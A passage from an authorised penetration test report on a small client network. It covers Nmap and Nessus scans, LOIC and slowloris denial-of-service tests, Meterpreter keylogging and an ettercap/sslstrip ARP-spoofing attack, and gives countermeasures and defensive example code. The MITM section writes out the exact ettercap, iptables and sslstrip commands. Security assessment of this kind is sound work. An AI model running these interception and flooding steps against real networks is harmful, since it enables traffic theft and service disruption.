              Have all identified targets of evaluation documented
              Obtain and review prioritized list of services
08:30-09:30   Test Operating Systems
              Use Microsoft Baseline Security Analyzer
              Use Nmap to discover devices (banner grabbing)
              Use Nessus to discover vulnerabilities
09:30-10:30   Test Network Devices
              Use Nmap to discover devices and ports
              Discover services
              DoS/DDoS attack
10:30-12:00   Test Core Business Application
              Armitage and Meterpreter used for testing but not successful.
13:00-14:30   Man in the Middle
              Spoofing and clear text traffic capturing
14:30-17:00   Contingency Testing, Report with Countermeasures
              Contingency testing in case one or more tests open or deny success
              Provide results in a brief outlining the test and results
              Provide countermeasures

Appendix I: Data Breach Calculator Report


Appendix J: Penetration Results and Countermeasures

Report and Countermeasures

Executive Summary

The following is a report of the tests undertaken to gain a foothold, capture data, and/or deny access to the client's business processes. It reviews the tests that were run and their outcomes. Where there are countermeasures that would thwart such activities, they are presented. The report is for Client X, who requested that their network be tested for exploitable weaknesses and deficiencies that could leave them liable for data leakage or cause a loss of service. The tests conducted were very focused, concentrating on a workstation and the server.

Test Objectives

1. Target Devices and Services
   a. Have all identified targets of evaluation documented
   b. Obtain and review prioritized list of services

2. Scan Operating Systems
   a. Use Microsoft Baseline Security Analyzer
   b. Use Nmap to discover devices (banner grabbing)
   c. Use Nessus to discover vulnerabilities

3. Test Network Devices
   a. Use Nmap to discover devices and ports
   b. Discover services
   c. DoS/DDoS attack

4. Test Core Business Application
   a. Test core business application against
      i. Clear text traffic capturing
      ii. Man in the middle
      iii. Spoofing
      iv. Armitage w/Meterpreter

Port Scanning Results and Issues

Scanning Windows machines

The first test was a scan of services and ports on the Microsoft devices. It discovered the default Windows system ports open: unsigned SMB, telnet, and high ports. This included the port scanning by Nessus as well as by the Microsoft Baseline Security Analyzer. The Nessus results showed an unsigned SMB/Samba port (445) open, as well as the clear text telnet port (23). Nessus found only one (1) medium and one (1) low alert for the server 10.10.10.5. Port 135 on the workstation was found open; it is used for Microsoft remote procedure calls (MSRPC). Port 139 was found open; it is used with SMB for file sharing, including with devices other than Microsoft's. Port 808 is the Streetsmarts web-based application, running encrypted. Port 992 was found to be an SSL port with a certificate error. Additional open ports were found in the range 49152-49157; this is because a Microsoft release in January 2008 moved the start of the dynamic port range to 49152. Some P2P (peer-to-peer) file sharing has been known to run over these ports. A possible attack that was not conducted in this test would have been privilege escalation via an SMB vulnerability, combined with brute forcing usernames and passwords. An attacker could also have social engineered the information from an unsuspecting user. There is some probability of this happening, but the users answer to only one IT person, which greatly reduces the likelihood of it occurring.

Countermeasures

Using a host-based firewall, either Microsoft's built-in firewall or a vendor product, the client can block traffic in either direction from the host. In the penetration test it was recorded that ZoneAlarm Free Antivirus and Firewall was able to deny our only exploit that gained control of, or information from, the systems. By trusting only the gateway and the server, the workstation would not have been easily compromised. It is possible to assume the identity of the gateway, but locking down ports would have greatly reduced that threat. The scan results are in Appendices AA through AC below.
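The port inventory and the trusted-host allow-list described above can be derived mechanically from the Nmap output, so that the firewall rules match what was actually found open rather than a hand-written list. The following is an added example written for this edition, not code from the paper or from Netwerk Guardian; it takes a subset of the Appendix AB Nmap lines as its sample input, and the gateway address 10.10.10.1 (the paper does not give one) and the port policy table are assumptions.

```python
"""Turn Nmap's "Discovered open port" lines into a per-host inventory and
derive the host-firewall allow-list the countermeasure describes (trust only
the gateway and the server). Added example, not the paper's code; the Nmap
lines are copied from Appendix AB, the gateway address and POLICY are assumed."""
import re
from collections import defaultdict

# Sample input: a subset of the Nmap output for the application server (Appendix AB).
NMAP_OUTPUT = """\
Scanning 10.10.10.5 [1000 ports]
Discovered open port 80/tcp on 10.10.10.5
Discovered open port 23/tcp on 10.10.10.5
Discovered open port 445/tcp on 10.10.10.5
Discovered open port 139/tcp on 10.10.10.5
Discovered open port 49154/tcp on 10.10.10.5
Discovered open port 135/tcp on 10.10.10.5
Discovered open port 808/tcp on 10.10.10.5
Discovered open port 992/tcp on 10.10.10.5
"""

GATEWAY = "10.10.10.1"          # assumed; the paper does not state the gateway address
SERVER = "10.10.10.5"
TRUSTED_HOSTS = {GATEWAY, SERVER}

# Policy (assumed): access is "any" (leave open), "trusted" (allow only from
# TRUSTED_HOSTS), "none" (block entirely) or "review" (needs a human decision).
POLICY = {
    23:  ("telnet, clear text", "none"),
    80:  ("http", "review"),
    135: ("MSRPC endpoint mapper", "trusted"),
    139: ("NetBIOS session / SMB", "trusted"),
    445: ("SMB", "trusted"),
    808: ("Streetsmarts application, encrypted", "any"),
    992: ("telnet over TLS (certificate error reported)", "review"),
}
DYNAMIC_RPC = range(49152, 65536)   # Windows dynamic RPC range starting at 49152

DISCOVERED = re.compile(r"Discovered open port (\d+)/(tcp|udp) on (\d+(?:\.\d+){3})")

def parse_open_ports(text):
    """Return {host: sorted list of (port, proto)} parsed from Nmap verbose output."""
    hosts = defaultdict(set)
    for port, proto, host in DISCOVERED.findall(text):
        hosts[host].add((int(port), proto))
    return {h: sorted(p) for h, p in hosts.items()}

def classify(port):
    """Map a port to (service label, access decision) using POLICY."""
    if port in POLICY:
        return POLICY[port]
    if port in DYNAMIC_RPC:
        return ("dynamic RPC", "trusted")
    return ("unclassified", "review")

def firewall_rules(host, ports):
    """Derive inbound rules for one host: (port, allowed_remote_ips), where an
    empty tuple means block the port from everyone. Ports with access "any"
    produce no rule; "review" ports are returned separately for a human."""
    rules, review = [], []
    peers = tuple(sorted(TRUSTED_HOSTS - {host}))
    for port, _proto in ports:
        label, access = classify(port)
        if access == "trusted":
            rules.append((port, peers))
        elif access == "none":
            rules.append((port, ()))
        elif access == "review":
            review.append((port, label))
    return rules, review

def report(text):
    """Inventory every host in the Nmap text and return {host: (rules, review)}."""
    return {host: firewall_rules(host, ports)
            for host, ports in parse_open_ports(text).items()}

if __name__ == "__main__":
    for host, (rules, review) in report(NMAP_OUTPUT).items():
        print(host)
        for port, allowed in rules:
            print(f"  port {port}: allow from {allowed or 'nobody (block)'}")
        for port, label in review:
            print(f"  port {port}: review ({label})")
```

The rule tuples map directly onto host-firewall rules (one allow rule per port restricted to the peer addresses, plus a default inbound block); ports 80 and 992 are deliberately left for review, since the paper reports a certificate error on 992 and does not say what serves port 80.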

DoS/DDoS Testing

The application server MAXWELLSM DoS/DDoS test used Low Orbit Ion Cannon (LOIC), infamously known for its use by the hacktivist group Anonymous, to perform a denial of service against the server in order to deny application use to the client machine. Later, another machine was used to point LOIC at the Windows 7 client machine.

Test 1 - Target port 808 on the application server with 10 threads and numerous TCP requests, waiting for responses. Attack started 13:20 12-Jan-2013. Results: After 5 minutes with 10 threads and speed set to fastest, the Server 2008 and the Windows 7 client were still able to communicate.

Test 2 - Target port 808 on the application server with 100 threads and numerous TCP requests, waiting for responses. Attack ran 13:32-13:46 12-Jan-2013. Results: 109,106,402 TCP requests and the application is up. The Windows error reporting service stopped and started at least twice.

Test 3 - Target port 808 on the application server with 1000 threads and numerous HTTP requests, not waiting for responses, to see if IIS crashes. Attack started 13:55 12-Jan-2013. Results: Despite LOIC requesting many pages many times and showing no failures, the application still launched.

Test 4 - DDoS against port 80 with 1000 threads, HTTP. Two machines hitting the server; started 14:05, ended 14:15. This included three (3) LOICs and one python script, slowloris.py, with 1000 new threads every ten (10) seconds. Results: The application still launched.

Countermeasures

No countermeasure is directly required, but a network access control (NAC) device could help protect other protocols. Such a device would enforce the number of connections per host on the network. This would greatly improve the chances for other protocols on the network, such as VoIP, to keep communicating, and lower the chances of other denial of service attacks succeeding.
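To make the "number of connections per host" control concrete, the following is an added example (not from the paper or from any NAC vendor) of a per-source sliding-window connection limiter of the kind a NAC or gateway enforces. The traffic replayed through it is constructed to resemble the LOIC test above, with one host opening connections to port 808 far faster than a normal client; the limit of 50 new connections per host per second is an assumed value.

```python
"""Per-source connection limiter with a sliding window, the control a NAC or
gateway applies to cap the number of connections per host. Added example,
not the paper's code; the replayed connection events are constructed to
resemble the LOIC test, and the limit values are assumed."""
from collections import defaultdict, deque

class PerHostConnectionLimiter:
    """Allow at most max_conns new connections per source within any window_ms."""

    def __init__(self, max_conns, window_ms):
        self.max_conns = max_conns
        self.window_ms = window_ms
        self.accepted_ts = defaultdict(deque)   # src -> timestamps (ms) of accepted conns
        self.dropped = defaultdict(int)

    def allow(self, src, ts_ms):
        """Return True if a new connection from src at ts_ms is within the limit."""
        q = self.accepted_ts[src]
        # Evict accepted connections that have aged out of the window.
        while q and ts_ms - q[0] >= self.window_ms:
            q.popleft()
        if len(q) >= self.max_conns:
            self.dropped[src] += 1
            return False
        q.append(ts_ms)
        return True

def replay(events, max_conns=50, window_ms=1000):
    """events: iterable of (ts_ms, src_ip, dst_ip, dst_port) in time order.
    Returns {src_ip: (accepted, dropped)}."""
    limiter = PerHostConnectionLimiter(max_conns, window_ms)
    accepted = defaultdict(int)
    for ts_ms, src, _dst, _dport in events:
        if limiter.allow(src, ts_ms):
            accepted[src] += 1
    sources = set(accepted) | set(limiter.dropped)
    return {s: (accepted[s], limiter.dropped[s]) for s in sources}

def constructed_events():
    """Constructed traffic (not captured data): flood host 10.10.10.9 opening
    1000 connections per second to port 808 on the server for two seconds, and
    the normal client 10.10.10.7 opening one connection per second."""
    events = [(ms, "10.10.10.9", "10.10.10.5", 808) for ms in range(2000)]
    events += [(500, "10.10.10.7", "10.10.10.5", 808),
               (1500, "10.10.10.7", "10.10.10.5", 808)]
    events.sort()
    return events

if __name__ == "__main__":
    for src, (ok, dropped) in sorted(replay(constructed_events()).items()):
        print(f"{src}: accepted {ok}, dropped {dropped}")
```

Timestamps are integer milliseconds so the window arithmetic is exact. Note that this caps new connections only; a slowloris-style test, which holds a few connections open as long as possible, is addressed by a cap on concurrent connections per host and by request timeouts on the web server rather than by a rate limit.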


Application Server Testing

Test 1: Used websploit. Results: Nothing to report, as the communication between the application and the server is encrypted by the client-side software.

Test 2: Meterpreter used with Armitage. The encrypted connection made it impossible to glean any data or to provide a way to leak data out. Meterpreter was used in this test with the administrator password known, which made the connection possible. Even a regular user whose password was known would be able to dump the password hashes and crack them later in order to attempt to escalate privileges; time is the factor in how successful the cracker would be. Results: We were able to log keystrokes and take screenshots of the user's computer. This is one way that data could be captured. In this test we show that key logging and screen captures are possible; however, they are not very effective against the application, as shown below in Image 4.

Countermeasures

In the test it was discovered that knowing a username, or a username and password, or escalating privileges by brute forcing passwords, helped make the reverse TCP shell possible. One of the ways we stopped this from happening again was to use ZoneAlarm Free Antivirus and Firewall software, with the gateway and the server set up as trusted and the rest of the same subnet as untrusted. This solution is an inexpensive way to harden the network.

Image 1 - Armitage Text Output of Key Logging

Image 2 - Email Credentials Entered

Image 3 - Screenshot before Launching Encrypted Application

Image 4 - After Launching Encrypted Application. Notice in the image below that the application icon, the big 'S', is present in the task bar and that on the workstation the application is in the foreground. However, the screenshot taken over the reverse TCP shell does not show it; the application is therefore encrypted with respect to the reverse TCP shell.


Sniffing and MITM Attacks

Using Ettercap we copied traffic between the user and the gateway to our penetration testing laptop. We used Ettercap, urlsnarf, dsniff, and Driftnet, with the commands entered below, to see traffic. In Ettercap we scanned the subnet and added target 1 = the gateway and target 2 = the victim machine. Here we were able to get a copy of everything being sent by the user to the laptop first, before it went on to the real gateway. This is done with sslstrip, iptables, and Ettercap's ARP-spoofing MITM attack:

ettercap --mitm ARP:REMOTE --text --quiet --write /root/sslstrip/ettercap.log --iface eth0

The GUI was also used to pick the target client Windows 7 machine 10.10.10.7 and, as the second target, the application server 10.10.10.5. In the CLI we entered:

root@bt:/# echo 1 > /proc/sys/net/ipv4/ip_forward
root@bt:/# cat /proc/sys/net/ipv4/ip_forward
root@bt:# sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

Now verify it took the filter:

root@bt:~# iptables -L -t nat
Chain PREROUTING (policy ACCEPT)
target     prot opt source               destination
REDIRECT   tcp  --  anywhere             anywhere             tcp dpt:www redir ports 10000

Chain INPUT (policy ACCEPT)
target     prot opt source               destination

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination

Chain POSTROUTING (policy ACCEPT)
target     prot opt source               destination

root@bt:# sudo python sslstrip.py -l 1000 -f lock.ico

(Note that, as transcribed, the REDIRECT target port is 10000 while sslstrip is told to listen on port 1000.)

Results with sslstrip: No data or text of any sort was visible, as all data was being passed through an encrypted channel.

Results with dsniff: Web addresses were visible, but no usernames or passwords. These results show the application is very secure.

Results with driftnet: There were no pictures or images of the site going across. Web addresses were being listed.

Results with urlsnarf:

root@bt:~# urlsnarf -n -i eth0
urlsnarf: listening on eth0 [tcp port 80 or port 8080 or port 3128]
10.10.10.7 - - [15/Jan/2013:23:10:12 -0500] "GET http://www.google.com/ HTTP/1.1" - - "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
10.10.10.7 - - [15/Jan/2013:23:10:13 -0500] "GET
10.10.10.7 - - [15/Jan/2013:23:11:17 -0500] "GET http://www.mwsystems.com/servlet/servlet.FileDownload?file=01540000000nqRS HTTP/1.1" - - "http://10.10.10.5/" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
10.10.10.7 - - [15/Jan/2013:23:11:17 -0500] "GET http://www.mwsystems.com/servlet/servlet.FileDownload?file=01540000000nr9Z HTTP/1.1" - - "http://10.10.10.5/" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
10.10.10.7 - - [15/Jan/2013:23:11:17 -0500] "GET http://www.mwsystems.com/servlet/servlet.FileDownload?file=01540000000nr9K HTTP/1.1" - - "http://10.10.10.5/" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
10.10.10.7 - - [15/Jan/2013:23:11:17 -0500] "GET http://www.mwsystems.com/servlet/servlet.FileDownload?file=01540000000nr9A HTTP/1.1" - - "http://10.10.10.5/" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
10.10.10.7 - - [15/Jan/2013:23:11:17 -0500] "GET http://www.mwsystems.com/servlet/servlet.FileDownload?file=01540000000nroD HTTP/1.1" - - "http://10.10.10.5/" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"

Executed commands:

root@bt:/# echo 1 > /proc/sys/net/ipv4/ip_forward
root@bt:/# cat /proc/sys/net/ipv4/ip_forward
1

In another terminal, we used Driftnet:

root@bt:/# driftnet -i eth0
root@bt:/# driftnet -i eth0 -v -s    (in an attempt to capture audio being streamed)

We could then see what images the user was looking at. Results: Images from the core business application were not being sent to our laptop despite driftnet running:

root@bt:~# driftnet -i eth0 -v
driftnet: using temporary file directory /tmp/driftnet-AmaowM
driftnet: listening on eth0 in promiscuous mode
driftnet: using filter expression `tcp'
driftnet: started display child, pid 2562
driftnet: link-level header length is 14 bytes
.driftnet: new connection: 10.10.10.7:49363 -> 23.45.9.75:80
...driftnet: new connection: 10.10.10.7:49365 -> 23.45.9.75:80
...driftnet: new connection: 10.10.10.7:49364 -> 23.45.9.75:80
...driftnet: new connection: 10.10.10.7:49368 -> 23.45.9.75:80
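The urlsnarf output above is in Common Log Format, so a defender can summarise it to see which sites users reach over clear-text HTTP and which internal pages send them there (here, the application server's own page at 10.10.10.5 is the referer for the unencrypted file downloads). The following is an added example, not from the paper; it uses three of the urlsnarf lines quoted in the report as its sample input and assumes that 10.10.10.x is the internal network.

```python
"""Summarise clear-text HTTP requests from a urlsnarf (Common Log Format)
capture: sites reached per source host, which internal pages referred users
to them, and how many requests carried parameters in the URL. Added example,
not the paper's code; the log lines below are copied from the report."""
import re
from collections import Counter, defaultdict
from urllib.parse import urlsplit

# Sample input: three lines from the urlsnarf capture quoted in the report.
URLSNARF_LOG = """\
10.10.10.7 - - [15/Jan/2013:23:10:12 -0500] "GET http://www.google.com/ HTTP/1.1" - - "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
10.10.10.7 - - [15/Jan/2013:23:11:17 -0500] "GET http://www.mwsystems.com/servlet/servlet.FileDownload?file=01540000000nqRS HTTP/1.1" - - "http://10.10.10.5/" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
10.10.10.7 - - [15/Jan/2013:23:11:17 -0500] "GET http://www.mwsystems.com/servlet/servlet.FileDownload?file=01540000000nr9Z HTTP/1.1" - - "http://10.10.10.5/" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
"""

# Common Log Format as urlsnarf prints it: client, ident, user, [time],
# "METHOD URL PROTO", status, size, "referer", "user-agent".
CLF = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) (?P<proto>[^"]*)" \S+ \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

def parse_urlsnarf(text):
    """Return one dict per parsable line, with the URL's host, whether it
    carried a query string, and the referer's host (None if absent)."""
    entries = []
    for line in text.splitlines():
        m = CLF.match(line)
        if not m:
            continue                      # skip banner lines and truncated records
        e = m.groupdict()
        u = urlsplit(e["url"])
        e["host"] = u.hostname
        e["has_query"] = bool(u.query)
        ref = e["referer"]
        e["referer_host"] = urlsplit(ref).hostname if ref not in ("", "-") else None
        entries.append(e)
    return entries

def summarise(entries, internal_prefix="10.10.10."):
    """Aggregate parsed entries into the three things a defender asks first."""
    by_source = defaultdict(Counter)
    internal_referers = Counter()
    with_params = 0
    for e in entries:
        by_source[e["src"]][e["host"]] += 1
        if e["referer_host"] and e["referer_host"].startswith(internal_prefix):
            internal_referers[e["referer_host"]] += 1
        if e["has_query"]:
            with_params += 1          # parameters travel in the clear too
    return {
        "by_source": {s: dict(c) for s, c in by_source.items()},
        "internal_referers": dict(internal_referers),
        "requests_with_parameters": with_params,
    }

if __name__ == "__main__":
    summary = summarise(parse_urlsnarf(URLSNARF_LOG))
    for src, hosts in summary["by_source"].items():
        print(f"{src} reached over clear-text HTTP: {hosts}")
    print("internal pages referring users to HTTP:", summary["internal_referers"])
    print("requests with URL parameters:", summary["requests_with_parameters"])
```

The internal_referers count is the actionable item: it names the internal page (here the application server's own front page) whose links send the workstation to an unencrypted site, which is what a sniffer on the same subnet will see.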

Countermeasures

No countermeasures needed to be taken to secure the core business application. However, countermeasures are needed to eliminate the ability to see what web or secure web traffic users are conducting. Again, a NAC device would help by qualifying not only the user but the device on the network. In addition, such a device can run a MITM attack against the attacker and route all of their traffic into a black hole. The Trustwave NAC appliance is one device that can perform this mitigation. A less costly approach for smaller companies would be to use a VPN or SSH tunnel to a known good server; some of these solutions are offered free on the web and some can be built in-house.
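Ettercap's ARP:REMOTE mode, used in the test above, works by making a single attacker MAC answer for both the gateway and the victim, which leaves a signature in every affected host's ARP cache. The following is an added example (not from the paper or from any NAC vendor) that checks a Windows "arp -a" listing for that signature; the table text is constructed, the gateway address 10.10.10.1 is assumed, and all MAC addresses are made-up values.

```python
"""Spot ARP cache poisoning of the kind ettercap's ARP:REMOTE mode performs,
where one attacker MAC answers for both the gateway and the victim. Added
example, not the paper's code; the ARP tables are constructed, the gateway
address 10.10.10.1 is assumed, and all MAC addresses are made up."""
import re
from collections import defaultdict

# Known-good IP-to-MAC bindings (assumed values), e.g. from a static ARP table
# kept by the operations manager.
KNOWN_GOOD = {
    "10.10.10.1": "00:11:22:33:44:01",   # gateway (assumed address)
    "10.10.10.5": "00:11:22:33:44:05",   # application server MAXWELLSM
}

# Constructed "arp -a" output on the Windows 7 client in normal operation.
CLEAN_ARP_TABLE = """\
Interface: 10.10.10.7 --- 0xb
  Internet Address      Physical Address      Type
  10.10.10.1            00-11-22-33-44-01     dynamic
  10.10.10.5            00-11-22-33-44-05     dynamic
  10.10.10.255          ff-ff-ff-ff-ff-ff     static
"""

# Constructed "arp -a" output after poisoning: both the gateway and the
# server now resolve to the same (made-up) attacker MAC.
POISONED_ARP_TABLE = """\
Interface: 10.10.10.7 --- 0xb
  Internet Address      Physical Address      Type
  10.10.10.1            00-0c-29-aa-aa-aa     dynamic
  10.10.10.5            00-0c-29-aa-aa-aa     dynamic
  10.10.10.255          ff-ff-ff-ff-ff-ff     static
"""

ARP_LINE = re.compile(
    r"^\s*(\d+(?:\.\d+){3})\s+([0-9a-fA-F]{2}(?:[-:][0-9a-fA-F]{2}){5})\s+(\w+)")

def parse_arp_table(text):
    """Return [(ip, mac, type)] with MACs normalised to lower-case colon form."""
    entries = []
    for line in text.splitlines():
        m = ARP_LINE.match(line)
        if m:
            ip, mac, kind = m.groups()
            entries.append((ip, mac.lower().replace("-", ":"), kind))
    return entries

def detect_arp_spoofing(entries, known_good=KNOWN_GOOD):
    """Two independent checks over (ip, mac, type) entries:
    1. mac-mismatch: an IP whose MAC differs from its known-good binding
    2. shared-mac: one unicast MAC claiming several IPs (both ends of a MITM)
    Returns a list of alert tuples, empty when the table looks healthy."""
    alerts = []
    mac_to_ips = defaultdict(set)
    for ip, mac, _kind in entries:
        if mac == "ff:ff:ff:ff:ff:ff":
            continue                      # the broadcast entry is normal
        expected = known_good.get(ip)
        if expected and expected != mac:
            alerts.append(("mac-mismatch", ip, expected, mac))
        mac_to_ips[mac].add(ip)
    for mac, ips in mac_to_ips.items():
        if len(ips) > 1:
            alerts.append(("shared-mac", mac, tuple(sorted(ips))))
    return alerts

def check_table(text, known_good=KNOWN_GOOD):
    """Parse an arp -a listing and return its alerts."""
    return detect_arp_spoofing(parse_arp_table(text), known_good)

if __name__ == "__main__":
    for name, table in (("clean", CLEAN_ARP_TABLE), ("poisoned", POISONED_ARP_TABLE)):
        print(name, check_table(table) or "no alerts")
```

The shared-mac check is the one that needs no prior knowledge and catches the two-sided poisoning directly; the mac-mismatch check needs a maintained list of known-good bindings but also catches a one-sided spoof. Routers that legitimately answer for a virtual address (VRRP or HSRP) will trip the shared-mac check, so those addresses belong on an exception list.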


Appendix AA: MBSA (Microsoft Baseline Security Analyzer) Scan Results

The automated scanning results are attached but abbreviated for length. The Microsoft Baseline Security Analyzer (MBSA) results have been included below. The workstation used in the test had an even lower score for vulnerabilities discovered.


Appendix AB: Nmap Scan Results

Scanning known hosts

Nmap MAXWELLSM (application server open ports)

Scanning 10.10.10.5 [1000 ports]
Discovered open port 80/tcp on 10.10.10.5
Discovered open port 23/tcp on 10.10.10.5
Discovered open port 445/tcp on 10.10.10.5
Discovered open port 139/tcp on 10.10.10.5
Discovered open port 49154/tcp on 10.10.10.5
Discovered open port 49156/tcp on 10.10.10.5
Discovered open port 49157/tcp on 10.10.10.5
Discovered open port 49155/tcp on 10.10.10.5
Discovered open port 135/tcp on 10.10.10.5
Discovered open port 808/tcp on 10.10.10.5
Discovered open port 49153/tcp on 10.10.10.5
Discovered open port 49152/tcp on 10.10.10.5
Discovered open port 992/tcp on 10.10.10.5
|_ssl-cert: ERROR
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC

ClientW7 (open ports)

135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open netbios-ssn
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-methods: No Allow or Public header in OPTIONS response (status code 503)
|_http-title: Service Unavailable
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49161/tcp open msrpc Microsoft Windows RPC

Appendix AC: Nessus Scan Results Application Server MAXWELLSM


Appendix AD: Nessus Scan Results Network

Appendix AE: Communication Plan

The communication plan used during the penetration test. This was a single pen tester performing the test, so no other communication had to be coordinated with teammates.

Time          Task
08:00-08:30   Target Devices and Services
              Have all identified targets of evaluation documented
              Obtain and review prioritized list of services
08:30-09:30   Test Operating Systems
              Call to operations manager: test to begin, 1 hour in length.
              Use Microsoft Baseline Security Analyzer
              Use Nmap to discover devices (banner grabbing)
              Use Nessus to discover vulnerabilities
09:30-10:30   Test Network Devices
              Call to operations manager: test to begin, 1 hour in length.
              Use Nmap to discover devices and ports
              Discover services
              DoS/DDoS attack
10:30-12:00   Test Core Business Application
              Armitage & Meterpreter used.
13:00-14:30   Man in the Middle
              Call to operations manager: test to begin, 1.5 hours in length.
              Spoofing & clear text traffic capturing
14:30-17:00   Contingency Testing, Report with Countermeasures
              Contingency testing in case one or more tests open or deny success
              Provide results in a brief outlining the test and results
              Provide countermeasures